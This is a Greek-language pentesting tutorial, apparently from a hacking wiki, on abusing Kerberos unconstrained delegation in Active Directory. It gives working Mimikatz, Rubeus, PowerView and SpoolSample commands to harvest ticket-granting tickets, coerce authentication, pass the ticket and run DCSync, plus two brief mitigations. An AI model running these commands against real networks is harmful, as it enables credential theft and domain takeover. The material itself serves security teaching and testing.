Unconstrained Delegation

Unconstrained delegation

Αυτή είναι μια δυνατότητα που μπορεί να ρυθμίσει ένας Διαχειριστής Τομέα σε οποιονδήποτε Υπολογιστή μέσα στον τομέα. Έτσι, κάθε φορά που ένας χρήστης συνδέεται στον Υπολογιστή, ένα αντίγραφο του TGT αυτού του χρήστη θα σταλεί μέσα στο TGS που παρέχεται από τον DC και θα αποθηκευτεί στη μνήμη στο LSASS. Έτσι, αν έχετε δικαιώματα Διαχειριστή στη μηχανή, θα μπορείτε να dump τα εισιτήρια και να προσποιηθείτε τους χρήστες σε οποιαδήποτε μηχανή.

Έτσι, αν ένας διαχειριστής τομέα συνδεθεί σε έναν Υπολογιστή με ενεργοποιημένη τη δυνατότητα "Unconstrained Delegation", και έχετε τοπικά δικαιώματα διαχειριστή σε αυτή τη μηχανή, θα μπορείτε να dump το εισιτήριο και να προσποιηθείτε τον Διαχειριστή Τομέα οπουδήποτε (domain privesc).

Μπορείτε να βρείτε αντικείμενα Υπολογιστή με αυτό το χαρακτηριστικό ελέγχοντας αν το userAccountControl χαρακτηριστικό περιέχει ADS_UF_TRUSTED_FOR_DELEGATION. Μπορείτε να το κάνετε αυτό με ένα φίλτρο LDAP του ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, το οποίο είναι αυτό που κάνει το powerview:

# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs

Φορτώστε το εισιτήριο του Διαχειριστή (ή του θύματος χρήστη) στη μνήμη με Mimikatz ή Rubeus για ένα Pass the Ticket. Περισσότερες πληροφορίες: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ Περισσότερες πληροφορίες σχετικά με την Unconstrained delegation στο ired.team.

Force Authentication

Αν ένας επιτιθέμενος είναι σε θέση να συμβιβάσει έναν υπολογιστή που επιτρέπεται για "Unconstrained Delegation", θα μπορούσε να παραπλανήσει έναν Print server να συνδεθεί αυτόματα σε αυτόν αποθηκεύοντας ένα TGT στη μνήμη του διακομιστή. Έτσι, ο επιτιθέμενος θα μπορούσε να εκτελέσει μια επίθεση Pass the Ticket για να προσποιηθεί τον λογαριασμό υπολογιστή του Print server.

Για να κάνετε έναν εκτυπωτή server να συνδεθεί σε οποιαδήποτε μηχανή μπορείτε να χρησιμοποιήσετε SpoolSample:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

Αν το TGT προέρχεται από έναν ελεγκτή τομέα, μπορείτε να εκτελέσετε μια DCSync attack και να αποκτήσετε όλους τους κατακερματισμούς από τον DC. Περισσότερες πληροφορίες σχετικά με αυτήν την επίθεση στο ired.team.

Ακολουθούν άλλοι τρόποι για να προσπαθήσετε να επιβάλετε μια αυθεντικοποίηση:

Mitigation

• Περιορίστε τις συνδέσεις DA/Admin σε συγκεκριμένες υπηρεσίες

• Ορίστε "Ο λογαριασμός είναι ευαίσθητος και δεν μπορεί να ανατεθεί" για προνομιακούς λογαριασμούς.